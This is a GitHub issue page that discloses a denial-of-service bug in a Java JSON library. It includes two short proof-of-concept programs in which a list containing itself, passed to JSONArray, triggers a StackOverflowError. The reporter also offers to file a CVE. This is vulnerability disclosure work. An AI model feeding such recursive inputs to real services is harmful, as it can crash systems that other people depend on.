If the value inside a Collection is itself, using it with JSONArray causes a StackOverflowError which may lead to DoS

PoC when initializing a `JSONArray`:
```java
public class POC {
    public static void main(String[] args) throws JSONException {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JSONArray jsonArray=new JSONArray(list);
    }
}
```
The result:
![image](https://user-images.githubusercontent.com/122801277/212698257-9d697d6a-4367-46ad-8b7b-caf4f5233843.png)

PoC when adding the list to an existing `JSONArray`:
```java
public class POC {
    public static void main(String[] args) throws JSONException {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JSONArray jsonArray=new JSONArray().put(list);
    }
}
```
The result:
![image](https://user-images.githubusercontent.com/122801277/212698427-f8ddb7db-ab6d-4bb0-a24a-62565060d122.png)

If the issue is indeed exploitable, we can create a CVE entry after the fixed version is released since we are a CNA.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

If the value inside a Collection is itself, using it with JSONArray causes a StackOverflowError which may lead to DoS #60

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

If the value inside a Collection is itself, using it with JSONArray causes a StackOverflowError which may lead to DoS #60

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions